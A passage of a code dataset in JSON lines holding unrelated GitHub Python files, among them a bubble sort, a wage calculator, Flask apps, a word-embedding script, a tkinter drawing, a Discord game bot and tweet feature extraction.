stock\n","repo_name":"k0s0y/DJ-56_MaksimenkoHW","sub_path":"3.2-crud/stocks_products/logistic/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22847801527","text":"# https://www.hackerrank.com/challenges/ctci-bubble-sort/problem\n\nn = int(input().strip())\na = list(map(int, input().strip().split(' ')))\n\nswap = 0\nfor i in range(n - 1):\n for j in range(n - 1 - i):\n if a[j] > a[j+1]:\n a[j] , a[j+1] = a[j+1] , a[j]\n swap += 1\nprint(\"Array is sorted in \" + str(swap) + \" swaps.\")\nprint(\"First Element: \" + str(a[0]))\nprint(\"Last Element: \" + str(a[-1]))\n","repo_name":"rednithin/Hackerrank","sub_path":"BubbleSort.py","file_name":"BubbleSort.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24884860407","text":"import json\nimport random\nimport functools\nfrom typing import List, Dict, Any\nfrom com.bridgelabz.employeewage.employeeWageException import EmployeeWageException\n\nclass EmployeeWage :\n #List to store various company objects.\n employee_wage_object_list = []\n\n def __init__ (self, **kwargs):\n self . company_name = kwargs [\"company_name\"]\n self . wage_per_hour = kwargs [\"wage_per_hour\"]\n self . part_time_hour = kwargs [\"part_time_hour\"]\n self . full_time_hour = kwargs [\"full_time_hour\"]\n self . monthly_working_days = kwargs [\"monthly_working_days\"]\n self . max_working_hrs = kwargs [\"max_working_hrs\"]\n self . 
daily_wage_list = []\n\n def hours_worked_today(self):\n '''\n To get the number of hours work was done today .\n :return: integer signifying hours of work done today\n :rtype: int\n '''\n attendance_today = random.randint(0, 2)\n return 0 if attendance_today == 0\\\n else self.full_time_hour if attendance_today == 1\\\n else self.part_time_hour\n\n def create_daily_wage_list(self):\n '''\n Creates a daily salary list of employee for the company .\n :return: List of daily salaries .\n :rtype: List\n '''\n work_hours_count = 0\n try:\n for _ in range(0, self.monthly_working_days, 1):\n work_hrs_today = self.hours_worked_today()\n if (work_hours_count + work_hrs_today >= self.max_working_hrs):\n break\n self.daily_wage_list.append(work_hrs_today * self.wage_per_hour)\n work_hours_count = work_hours_count + work_hrs_today\n except TypeError:\n raise EmployeeWageException(\"Data corrupt.\")\n\n def get_monthly_wage(self):\n '''\n Calculates total wage from the wage list.\n :return: Total wage\n :rtype: int\n '''\n self.create_daily_wage_list()\n return functools.reduce(lambda x, y : x + y, self . daily_wage_list)\n\n @staticmethod\n def get_emp_wage_object(company_dict):\n \"\"\"\n :param Dictionary of EmployeeWage object data\n :return: EmployeeWage object\n \"\"\"\n employee_wage_object = EmployeeWage(\n company_name = company_dict.get(\"company_name\"),\n wage_per_hour = company_dict.get(\"wage_per_hour\"),\n part_time_hour = company_dict.get(\"part_time_hour\"),\n full_time_hour = company_dict.get(\"full_time_hour\"),\n monthly_working_days = company_dict.get(\"monthly_working_days\"),\n max_working_hrs = company_dict.get(\"max_working_hrs\"),\n daily_wage_list = company_dict.get(\"daily_wage_list\"))\n return employee_wage_object\n\n @staticmethod\n def get_data_from_file(str):\n '''\n Parses through a json file to create a list of EmployeeWage type objects.\n :param str: File path\n :type str: str\n :return: EmployeeWage object list.\n :rtype: list\n '''\n if not str.lower().endswith('.json'):\n raise EmployeeWageException(\"Not a json file.\")\n try:\n with open(str, 'r') as data:\n company_dictionary_list = json.load(data)\n for company_dict in company_dictionary_list:\n emp_wage_obj = EmployeeWage.get_emp_wage_object(company_dict)\n EmployeeWage.employee_wage_object_list.append(emp_wage_obj)\n\n return EmployeeWage.employee_wage_object_list\n except FileNotFoundError:\n raise EmployeeWageException(\"File not found.\")\n\n\ndef driver_function(file):\n '''\n Prints the total monthly wage for employees of different companies.\n :param file:\n :type file:\n '''\n for emp_wage_obj in EmployeeWage.get_data_from_file(file):\n print(\"{} employee earned Rs {}\".format(emp_wage_obj.company_name, emp_wage_obj.get_monthly_wage()))\n\nif __name__ == \"__main__\":\n driver_function('./CompanyDetails.json')","repo_name":"RanaShubham/employee_wage","sub_path":"employeeWage.py","file_name":"employeeWage.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"86737704797","text":"print(\"\\n\\tEsse programa vai ler dois valores e mostrar a \\n\\tdiferença entre eles (o maior valor menos o menor valor)\")\n\nvalor1 = float(input(\"\\n\\n\\tDigite o PRIMEIRO valor: \"))\nvalor2 = float(input(\"\\n\\n\\tDigite o SEGUNDO valor: \"))\n\ndiferenca1 = valor1 - valor2\ndiferenca2 = valor2 - valor1\n\nif valor1>valor2:\n print(\"\\n\\tA diferença entre os valores é: {}\".format(diferenca1))\nelif valor1 \" + 
txt.readline()\n\n txt1 = open('output/saida.txt', 'w')\n txt1.write(texto)\n txt1.close()\n\n return redirect('/')\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n file.filename = \"Teste.txt\"\n # If the user does not select a file, the browser submits an\n # empty file without a filename.\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return redirect(url_for('upload_file', name=filename))\n return '''\n \n Upload new File\n

<h1>Upload new File</h1>\n    <form method=post enctype=multipart/form-data>\n      <input type=file name=file>\n      <input type=submit value=Upload>\n    </form>
\n \n \n '''\n\n@app.route('/baixar')\ndef download():\n path = \"output/saida.txt\"\n return send_file(path, as_attachment=True)\n\n@app.route('/do')\ndef downloadTxt():\n return'''\n \n \n \n \n \n '''\n\nif __name__ == '__main__':\n # This is used when running locally only. When deploying to Google App\n # Engine, a webserver process such as Gunicorn will serve the app. You\n # can configure startup instructions by adding `entrypoint` to app.yaml.\n app.run(host='127.0.0.1', port=8080, debug=True)\n# [END gae_python3_app]\n# [END gae_python38_app]\n","repo_name":"maonaparede/testAppEngine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3213790048","text":"#!/usr/bin/python3.6\r\n# -*- coding: utf-8 -*-\r\n# @Time : 2022/7/14 16:38\r\n# @Author : Liangliang\r\n# @File : execution.py\r\n# @Software: PyCharm\r\n\r\nimport jieba\r\nimport pandas as pd\r\nimport s3fs\r\nimport time\r\nimport math\r\nimport numpy as np\r\nimport argparse\r\nimport datetime\r\nimport os\r\nimport base64\r\nfrom multiprocessing.dummy import Pool\r\nos.system(\"pip install dataclasses\")\r\nos.system(\"pip install gensim\")\r\nos.system(\"pip install tarfile\")\r\nfrom gensim.models import KeyedVectors\r\nimport requests\r\nimport tarfile\r\nresult = 0\r\ncorpus = 0\r\n\r\ndef multiprocessingWrite(file_number,data,output_path,count):\r\n #print(\"开始写第{}个文件 {}\".format(file_number,datetime.datetime.now()))\r\n n = len(data) # 列表的长度\r\n #s3fs.S3FileSystem = S3FileSystemPatched\r\n #fs = s3fs.S3FileSystem()\r\n with open(os.path.join(output_path, 'pred_{}_{}.csv'.format(count,int(file_number))), mode=\"a\") as resultfile:\r\n if n > 1:#说明此时的data是[[],[],...]的二级list形式\r\n for i in range(n):\r\n line = \",\".join(map(str, data[i])) + \"\\n\"\r\n resultfile.write(line)\r\n else:#说明此时的data是[x,x,...]的list形式\r\n line = \",\".join(map(str, data)) + \"\\n\"\r\n resultfile.write(line)\r\n print(\"第{}个大数据文件的第{}个子文件已经写入完成,写入数据的行数{} {}\".format(count,file_number,n,datetime.datetime.now()))\r\n\r\nclass S3FileSystemPatched(s3fs.S3FileSystem):\r\n def __init__(self, *k, **kw):\r\n super(S3FileSystemPatched, self).__init__(*k,\r\n key=os.environ['AWS_ACCESS_KEY_ID'],\r\n secret=os.environ['AWS_SECRET_ACCESS_KEY'],\r\n client_kwargs={'endpoint_url': 'http://' + os.environ['S3_ENDPOINT']},\r\n **kw\r\n )\r\n\r\n\r\nclass S3Filewrite:\r\n def __init__(self, args):\r\n super(S3Filewrite, self).__init__()\r\n self.output_path = args.data_output\r\n\r\n\r\ndef write(data, args, count):\r\n #注意在此业务中data是一个二维list\r\n n_data = len(data) #数据的数量\r\n n = math.ceil(n_data/args.file_max_num) #列表的长度\r\n start = time.time()\r\n for i in range(0,n):\r\n multiprocessingWrite(i, data[i * args.file_max_num:min((i + 1) * args.file_max_num, n_data)],\r\n args.data_output, count)\r\n cost = time.time() - start\r\n print(\"write is finish. write {} lines with {:.2f}s\".format(n_data, cost))\r\n\r\ndef getEmbedding(sentence, i, roleid, args, count):\r\n '''sentences:分词的句子,为base64编码,需要先解码\r\n i:序号\r\n roleid: 数据的id\r\n '''\r\n sentences = str(base64.b64decode(sentence), 'utf-8')\r\n global result\r\n if i%100000 == 0:\r\n print(\"第{}个文件的第{}个任务开始执行! 
{}\".format(count, i, datetime.datetime.now()))\r\n flag = False #表示当前的sentences的分词结果是否都可以查到词向量 False: 表示所有的词都没有词向量 True:表示至少有一个词可以查到词向量\r\n value = np.zeros((1, args.dim))\r\n if len(sentences) > 0:\r\n words = jieba.cut(sentences)\r\n counts = 0\r\n for word in words:\r\n try:\r\n value = value + corpus[word]\r\n counts = counts + 1\r\n flag = True\r\n except KeyError:\r\n pass\r\n else:\r\n flag = False\r\n if flag == True:#有句子向量\r\n value = value/counts\r\n value = value.astype(\"str\")\r\n result[i, 0] = str(roleid)\r\n result[i, 1] = sentence\r\n result[i, 2::] = value\r\n else:#无句子向量输出\r\n result[i, 0] = str(roleid)\r\n result[i, 1] = sentence\r\n result[i, 2::] = \"no\"\r\n if i%100000 == 0:\r\n print(\"第{}个文件的第{}个任务执行完成! {}\".format(count, i, datetime.datetime.now()))\r\n\r\nif __name__ == \"__main__\":\r\n #配置参数\r\n parser = argparse.ArgumentParser(description='算法的参数')\r\n parser.add_argument(\"--dim\", help=\"单词表中词embedding的维数\", type=int, default=100)\r\n parser.add_argument(\"--thread_num\", help=\"多线程编程的线程数目\", type=int, default=1000)\r\n parser.add_argument(\"--file_max_num\", help=\"单个csv文件中写入数据的最大行数\", type=int, default=5000000)\r\n parser.add_argument(\"--data_input\", help=\"输入数据的位置\", type=str, default='')\r\n parser.add_argument(\"--data_output\", help=\"数据的输出位置\", type=str, default='')\r\n parser.add_argument(\"--tb_log_dir\", help=\"日志位置\", type=str, default='')\r\n args = parser.parse_args()\r\n print(\"开始下载word embedding文件! {}\".format(datetime.datetime.now()))\r\n #远程下载文件 https://zhuanlan.zhihu.com/p/106309634\r\n url = 'https://ai.tencent.com/ailab/nlp/en/data/tencent-ailab-embedding-zh-d100-v0.2.0.tar.gz'\r\n res = requests.get(url, stream=True)\r\n total_length = int(res.headers.get('content-length'))\r\n with open(\"tencent-ailab-embedding-zh-d100-v0.2.0.tar.gz\", \"wb\") as pypkg:\r\n for chunk in res.iter_content(chunk_size=1024):\r\n if chunk:\r\n pypkg.write(chunk)\r\n print(\"词嵌入文件下载完成, 开始解压下载文件! {}\".format(datetime.datetime.now()))\r\n #解压文件\r\n tar = tarfile.open(\"tencent-ailab-embedding-zh-d100-v0.2.0.tar.gz\")\r\n tar.extractall(path=\"tencent-ailab-embedding-zh-d100-v0.2.0\")\r\n tar.close()\r\n print(\"词嵌入文件解压完成! 
{}\".format(datetime.datetime.now()))\r\n #删除已下载的tar.gz文件,节省存储空间\r\n os.remove(\"tencent-ailab-embedding-zh-d100-v0.2.0.tar.gz\")\r\n #打印文件首行看文件是否正常\r\n f = open(\"./tencent-ailab-embedding-zh-d100-v0.2.0/tencent-ailab-embedding-zh-d100-v0.2.0/tencent-ailab-embedding-zh-d100-v0.2.0.txt\",'r',encoding=\"utf8\")\r\n print(\"词嵌入文件的首行信息:\",f.readline())\r\n f.close()\r\n\r\n # 读取数据文件\r\n path = args.data_input.split(',')[0]\r\n s3fs.S3FileSystem = S3FileSystemPatched\r\n fs = s3fs.S3FileSystem()\r\n input_files = sorted([file for file in fs.ls(path) if file.find(\"part-\") != -1])\r\n count = 0\r\n corpus = KeyedVectors.load_word2vec_format('./tencent-ailab-embedding-zh-d100-v0.2.0/tencent-ailab-embedding-zh-d100-v0.2.0/tencent-ailab-embedding-zh-d100-v0.2.0.txt', binary=False,\r\n encoding=\"utf8\")\r\n #删除txt文件节省空间内存11G\r\n os.remove(\"./tencent-ailab-embedding-zh-d100-v0.2.0/tencent-ailab-embedding-zh-d100-v0.2.0/tencent-ailab-embedding-zh-d100-v0.2.0.txt\")\r\n #处理数据\r\n for file in input_files:\r\n pool = Pool(processes=args.thread_num)\r\n count = count + 1\r\n print(\"当前正在处理第{}个文件,文件路径:{}......\".format(count, \"s3://\" + file))\r\n data = pd.read_csv(\"s3://\" + file, sep=',', header=None, usecols=[0,1]).astype('str') # 读取数据,第一列为id,第二列为中文txt\r\n n = data.shape[0]\r\n result = np.zeros((n, args.dim + 2)).astype(\"str\")\r\n for i in range(n):\r\n pool.apply_async(func=getEmbedding, args=(data.iloc[i, 1], i, data.iloc[i, 0], args, count,))\r\n pool.close()\r\n pool.join()\r\n write(result.tolist(), args, count)\r\n print(\"已完成第{}个文件数据的推断! {}\".format(count, datetime.datetime.now()))","repo_name":"hmliangliang/bertSentencesEmbedding","sub_path":"execution.py","file_name":"execution.py","file_ext":"py","file_size_in_byte":7562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10002370954","text":"import math\nimport numpy as np\nimport random\nimport tkinter as tk\nimport time\n\nfrom PIL import Image\n\nroot = tk.Tk()\n\n# root.geometry(\"300x300-1000-1000\")\n# root.state('zoomed')\n\n\nroot.title(\"Leaf Mandala\")\n\nwidth = 500\nheight = 500\nwin = tk.Canvas(root,width=width ,height=height)\nwin.pack()\n\nnLines = 12\nangle = (2 * math.pi) / float(nLines)\nlineAngles = [x for x in range(nLines)]\nallLines = []\n# Radius decreases each time\nfor radius in range((min(width,height) // 2) - 30,0,-50):\n # If ABC is a right angled triangle, with A and B being two points in the base and C on the top being a point on the hypotenuse\n # Let Angle(ABC) be 90 degree, and let Angle(BAC) = Angle(ACB) = 45 degrees\n # Theta will be the angle at which a line will be drawn with respect to the center\n for theta in lineAngles:\n # This line shall be the hyptenuse\n C = [(math.cos(theta * angle) * (radius)) + width / 2, (math.sin(theta* angle) * (radius )) + height / 2 ]\n # B is at the center\n B = [(width / 2),(height / 2)]\n # Since now we know C,B, we have to find A\n # A regular pythagorean formula wont do the job as it gives distance, but we want coordinates\n # You shall hence have to use some geometry to figure out the point. 
The below link explains it perfectly\n # https://math.stackexchange.com/questions/927802/how-to-find-coordinates-of-3rd-vertex-of-a-right-angled-triangle-when-everything\n \n # We want to make a leaf, and hence a leaf when split in center forms two traingles.\n # Due to this we shall find two A's\n # This is also directly achieved as a quadratic equation shall return two values\n x = (C[0] + B[1] + B[0] - C[1]) / 2\n A = [ x, C[1] - B[0] + x]\n xd = (C[0] - B[1] + B[0] + C[1]) / 2\n Ad = [xd,C[1] - xd + B[0]]\n # Create both the sides of the lead and smoothen it\n win.create_line(C[0],C[1],A[0],A[1],B[0],B[1],smooth=True)\n win.create_line(C[0],C[1],Ad[0],Ad[1],B[0],B[1],smooth=True)\n win.update()\n # time.sleep(1)\n\n\n\n# Can save using this\n\n# win.pack()\n# win.update()\n# win.postscript(file=\"file_name.eps\", colormode='color')\n# img = Image.open(\"file_name.eps\")\n# img.save('filename.png')\n\nroot.mainloop()","repo_name":"TheNova22/tkArt","sub_path":"leafMandala.py","file_name":"leafMandala.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"14240352866","text":"import discord\nimport os\nimport random\nimport re\n\nimport battleship\nimport tictactoe\nimport hangman\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n print('{0.user} has connected'.format(client))\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n\n if \"gamebot!help\" in message.content:\n embed = discord.Embed(\n title=\"Gamebot\",\n color=discord.Color.from_rgb(252, 164, 28)\n )\n embed.add_field(name=\"*The best way to play games on Discord*\", value=\"We have relocated to https://actiniumn404.github.io/Gamebot/ because of the charactor limit, so please go there.\")\n embed.set_author(name=f\"Gamebot\")\n await message.reply(embed=embed, mention_author=False)\n\n if \"<@!886304776042737675>\" in message.content:\n await message.channel.send(\"Hello! It's a good day for a game right?\")\n\n rps = re.match(\"!rps (r|p|s)\", message.content)\n if rps:\n move = str(rps.group(1)).lower()\n choice = random.choice([\"rock\", \"paper\", \"scissors\"])\n j = {\n \"r\":{\n \"rock\":\"we tied\",\n \"paper\":\"I won\",\n \"scissors\":\"you won\"\n },\n \"p\":{\n \"rock\":\"you won\",\n \"paper\":\"we tied\",\n \"scissors\":\"I won\"\n },\n \"s\":{\n \"rock\":\"I won\",\n \"paper\":\"you won\",\n \"scissors\":\"we tied\"\n }\n }\n\n convert = {\"r\":\"rock\", \"s\":\"scissors\", \"p\":\"paper\"}\n\n embed = discord.Embed(\n title=\"Rock, Paper, Scissors\",\n color=discord.Color.from_rgb(252, 164, 28)\n )\n embed.set_author(name=f\"Gamebot\")\n if move in [\"r\", \"p\", \"s\"]:\n embed.add_field(name=\"Results\", value=f\"You picked {convert[move]} and I picked {choice}. Therefore, {j[move][choice]}.\")\n else:\n embed.add_field(name=\"Results\", value=f\"ERROR. Your choice was not understood. 
Please type either r, p, or s for rock, paper, and scissors respectively\")\n embed.set_footer(text=f\"For all gamebot commands, type gamebot!help\")\n\n await message.reply(embed=embed, mention_author=False)\n\n\n newhangman = re.match(\"!newhangman (.*)\", message.content)\n if newhangman:\n await hangman.new(message, newhangman)\n\n hangmanguess = re.match(\"!hangman ([0-9]+) guess ([a-zA-Z]+)\", message.content)\n if hangmanguess:\n await hangman.guess(message, hangmanguess)\n \n endhangman = re.match(\"!hangman ([0-9]+) end game\", message.content)\n if endhangman:\n await hangman.end(message, endhangman)\n\n # Tic tack toe\n ttt = re.match(\"!newtictactoe (.*)\", message.content)\n if ttt:\n await tictactoe.new(message, ttt)\n\n tttinvite = re.match(\"!tictactoe ([0-9]+) (accept|decline)\", message.content)\n if tttinvite:\n await tictactoe.invite(message, tttinvite)\n\n tttplay = re.match(\"!tictactoe ([0-9]+) play ([A-Ca-c])([1-3])\", message.content)\n if tttplay:\n await tictactoe.play(message, tttplay)\n\n # battleship\n newship = re.match(\"!newbattleship\\n```\\n(.*)\\n```\", message.content, flags=re.MULTILINE | re.DOTALL)\n if newship:\n matrix = newship.group(1)\n matrix = matrix.split(\"\\n\")\n matrix = [x.replace(\"_\", \" \").split(\" \") for x in matrix]\n await battleship.new(message, matrix) \n\n\nclient.run(os.getenv('TOKEN'))","repo_name":"actiniumn404/Gamebot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70492540648","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_login import LoginManager\nfrom flask_mail import Mail\nfrom flask_admin import Admin\n# from flask_bouncer import requires, ensure, Bouncer\nimport logging\nfrom logging.handlers import SMTPHandler\nfrom logging.handlers import RotatingFileHandler\nimport os\n# import pusher\nfrom config import Config\n\ndb = SQLAlchemy()\nmigrate = Migrate()\nlogin = LoginManager()\nmail = Mail()\nadmin = Admin()\n# login_view is used by LoginManager for pages that require\n# that user be logged-in.\nlogin.login_view = 'auth.login'\n\n# pusher = pusher.Pusher(\n# app_id=os.getenv('PUSHER_APP_ID'),\n# key=os.getenv('PUSHER_APP_KEY'),\n# secret=os.getenv('PUSHER_APP_SECRET'),\n# cluster=os.getenv('PUSHER_APP_CLUSTER'),\n# ssl=True)\n\n\ndef create_app(config_class=Config):\n app = Flask(__name__)\n app.config.from_object(config_class)\n\n # Flask-Bootstrap optional bootswatch theme\n app.config['FLASK_ADMIN_SWATCH'] = 'cosmo'\n\n db.init_app(app)\n migrate.init_app(app, db)\n login.init_app(app)\n mail.init_app(app)\n admin.init_app(app)\n\n # Register Blueprints\n from myapp.errors import bp as errors_bp\n app.register_blueprint(errors_bp)\n\n from myapp.auth import bp as auth_bp\n app.register_blueprint(auth_bp, url_prefix='/auth')\n\n from myapp.main import bp as main_bp\n app.register_blueprint(main_bp)\n\n from myapp.store import bp as store_bp\n app.register_blueprint(store_bp, url_prefix='/store')\n\n from myapp.admin import bp as admin_bp\n app.register_blueprint(admin_bp, url_prefix='/admin')\n\n # If not in debug mode, log all errors\n if not app.debug and not app.testing:\n # Emailing\n if app.config['MAIL_SERVER']:\n auth = None\n if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']:\n auth = (app.config['MAIL_USERNAME'],\n app.config['MAIL_PASSWORD'])\n secure = None\n if 
app.config['MAIL_USE_TLS']:\n secure = ()\n mail_handler = SMTPHandler(\n mailhost=(app.config['MAIL_SERVER'], app.config['MAIL_PORT']),\n fromaddr='no-reply@' + app.config['MAIL_SERVER'],\n toaddrs=app.config['ADMINS'],\n subject='Olivier\\'s Breads Failure',\n credentials=auth, secure=secure)\n mail_handler.setLevel(logging.ERROR)\n app.logger.addHandler(mail_handler)\n\n # Logging\n if not os.path.exists('logs'):\n os.mkdir('logs')\n file_handler = RotatingFileHandler(\n 'logs/website.log', maxBytes=10240, backupCount=10)\n file_handler.setFormatter(logging.Formatter(\n '%(asctime)s %(levelname)s: \\\n %(message)s [in %(pathname)s:%(lineno)d]'))\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n\n app.logger.setLevel(logging.INFO)\n app.logger.info(\"%s startup\" % (app.config['APP_NAME']))\n\n return app\n\n\n# from myapp must be at the bottom of __init__ to avoid circular imports!!!\nfrom myapp import models\n","repo_name":"leomorpho/flask-website","sub_path":"myapp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23626174544","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/3/11 9:46\n# @Author : Tammy\n# @Email : 18585053@qq.com\n# @File : http_request.py\n'''1)http请求类(可以根据传递的method--get/post完成不同的请求),要求有返回值。'''\nimport requests\nfrom API_7.common.public.input_log import InputLog\n\nclass HttpRequest:\n '''编写一个http请求类,可根据传递的参数完成不同的请求,要求有返回值'''\n\n @staticmethod\n def request_method(url, params, method, cookie):\n '''请求方法'''\n if method.lower() == 'get':\n try:\n resp = requests.get(url, params=params,cookies=cookie)\n return resp\n except Exception as e:\n print('请求报错:错误是{}'.format(e))\n InputLog().error(e)\n elif method.lower() == 'post':\n try:\n resp = requests.post(url, data=params,cookies=cookie)\n return resp\n except Exception as e:\n print('请求报错:错误是{}'.format(e))\n InputLog().error(e)\n\n\nif __name__ == '__main__':\n url_1 = 'http://47.107.168.87:8080/futureloan/mvc/api/member/login'\n param_1 = {'mobilephone': '18813989009', 'pwd': '123456'}\n cookie =None\n resp_1 = HttpRequest().request_method(url_1, param_1, 'Get',cookie)\n print(resp_1.json())\n cookie = resp_1.cookies\n print(cookie)\n url_2 = 'http://47.107.168.87:8080/futureloan/mvc/api/member/recharge'\n param_2 = {'mobilephone': '18813989009', 'amount': '1000.00'}\n text_2 = HttpRequest().request_method(url_2, param_2, 'Get',cookie)\n print(text_2.text)\n\n\n\n\n\n\n","repo_name":"yeyinganny/python_api_test","sub_path":"API_7/common/public/http_request.py","file_name":"http_request.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30640556676","text":"\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\nfrom collections import Counter\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.preprocessing import MaxAbsScaler\nfrom textblob import TextBlob\nfrom textblob_fr import PatternTagger, PatternAnalyzer\nfrom nltk.corpus import stopwords \nfrom vaderSentiment_fr.vaderSentiment import SentimentIntensityAnalyzer\nfrom cleaning import cleaning, tokenize\n# for the TFID vectorizer\nfeatures_vectorizer = 200\n\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\nNumerical feature creation 
functions\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# convert timestamp to real date\ndef mois(x):\n return int(datetime.fromtimestamp(x/1000).month)\ndef jour(x):\n return int(datetime.fromtimestamp(x/1000).day)\ndef heure(x):\n return int(datetime.fromtimestamp(x/1000).hour)\n\n# create a feature from hashtags based on the frequency of features in all the tweets, the dictionary updates at each call\ndef feat_tags(data,freq_tags = None):\n tags = []\n lis = []\n cnt = Counter()\n df = data[data['hashtags'] != '[]']\n for hashtag in df['hashtags']:\n words = str(hashtag)\n lis = words[1:-1].split(',')\n for word in lis:\n tags.append(word.replace('\\'','').replace(' ',''))\n if (freq_tags != None):\n existing_tags = freq_tags.keys()\n for tag in tags:\n if (tag in existing_tags):\n cnt[tag]+= 1 + freq_tags[tag]\n else :\n cnt[tag]+= 1\n else :\n for tag in tags:\n cnt[tag]+=1\n \n feat = np.zeros(len(data))\n for index, hashtag in enumerate(data['hashtags']):\n words = str(hashtag)\n lis = words[1:-1].split(',')\n for word in lis:\n feat[index] += cnt[word.replace('\\'','').replace(' ','')]\n\n return feat, cnt\n\ndef feat_urls(data):\n urls = []\n lis = []\n cnt = Counter()\n df = data[data['urls'] != '[]']\n for url in df['urls']:\n words = str(url)\n lis = words[1:-1].split(',')\n for word in lis:\n urls.append(word.replace('\\'','').replace(' ',''))\n \n for url in urls:\n cnt[url]+=1\n feat = np.zeros(len(data))\n feat = np.zeros(len(data))\n for index, url in enumerate(data['urls']):\n words = str(url)\n lis = words[1:-1].split(',')\n for word in lis:\n feat[index] += cnt[word.replace('\\'','').replace(' ','')]\n\n return feat\n\ndef tokenize_tags(data):\n words = str(data)\n if (words!= '[]'):\n hashtags = words[1:-1].split(',')\n return [word.replace('\\'','').replace(' ','') for word in hashtags] \n else:\n return []\n\ndef tokenize_urls(data):\n words = str(data)\n if (words!= '[]'):\n urls = words[1:-1].split(',')\n return [word.replace('\\'','').replace(' ','') for word in urls] \n else:\n return []\n\n \n\ndef feat_url(data):\n feat = np.zeros(len(data))\n for index, url in enumerate(data['urls']):\n if(url !='[]'):\n feat[index] = 1\n return feat\n \n \n\n# Create sentiment analysis features, based on two methods textblob and vader\ndef sentiment_analysis(data, method = 'all'):\n if (method == 'textblob') :\n sentiment = data['text'].apply(lambda x : list(TextBlob(x, pos_tagger=PatternTagger(), analyzer=PatternAnalyzer()).sentiment))\n df_sentiments = sentiment.apply(pd.Series)\n df_sentiments.columns = ['polarity', 'subjectivity']\n return df_sentiments\n \n elif (method == 'vader') :\n #Sentiment Analysis\n SIA = SentimentIntensityAnalyzer()\n # Applying Model, Variable Creation\n data['Polarity_vader']=data[\"text\"].apply(lambda x:SIA.polarity_scores(x)['compound'])\n data['Neutral_vader']=data[\"text\"].apply(lambda x:SIA.polarity_scores(x)['neu'])\n data['Negative_vader']=data[\"text\"].apply(lambda x:SIA.polarity_scores(x)['neg'])\n data['Positive_vader']=data[\"text\"].apply(lambda x:SIA.polarity_scores(x)['pos']) \n return data[['Polarity Score','Neutral Score','Negative Score','Positive Score']]\n \n elif (method =='all'):\n #Sentiment Analysis\n SIA = SentimentIntensityAnalyzer()\n # Applying Model, Variable Creation\n data['Polarity_vader']=data[\"text\"].apply(lambda x:SIA.polarity_scores(x)['compound'])\n data['Neutral_vader']=data[\"text\"].apply(lambda x:SIA.polarity_scores(x)['neu'])\n 
data['Negative_vader']=data[\"text\"].apply(lambda x:SIA.polarity_scores(x)['neg'])\n data['Positive_vader']=data[\"text\"].apply(lambda x:SIA.polarity_scores(x)['pos'])\n sentiment = data['text'].apply(lambda x : list(TextBlob(x, pos_tagger=PatternTagger(), analyzer=PatternAnalyzer()).sentiment))\n \n df_sentiments = sentiment.apply(pd.Series)\n df_sentiments.columns = ['polarity_blob', 'subjectivity_blob']\n return pd.concat([data[['Polarity_vader','Neutral_vader','Negative_vader','Positive_vader']],df_sentiments],axis=1)\n \n else:\n return None \n\n\n \n# The function which gathers all the feature creations\ndef feat_creation(data,method, freq_tags = None):\n \n features = data.drop(columns = ['text','mentions','urls','hashtags','TweetID'])\n \n features['freq_hashtags'], dic_tags = feat_tags(data, freq_tags)\n features['freq_urls'] = feat_urls(data)\n features['tokenize_tags'] = data['hashtags'].apply(lambda x: tokenize_tags(x))\n features['tokenize_urls'] = data['urls'].apply(lambda x: tokenize_urls(x))\n features['url'] = feat_url(data)\n features['month'] = data['timestamp'].apply(lambda x: mois(x))\n features['day'] = data['timestamp'].apply(lambda x: jour(x))\n features['hour'] = data['timestamp'].apply(lambda x: heure(x))\n features['nb_urls'] = features['tokenize_urls'].apply(lambda x : int(x.count('\\'')/2) )\n features['nb_tags'] = features['tokenize_tags'].apply(lambda x : int(x.count('\\'')/2) )\n \n df_sentiments = sentiment_analysis(data,method)\n features = pd.concat([features, df_sentiments], axis=1)\n return features, dic_tags\n \n# Possibility to normalize 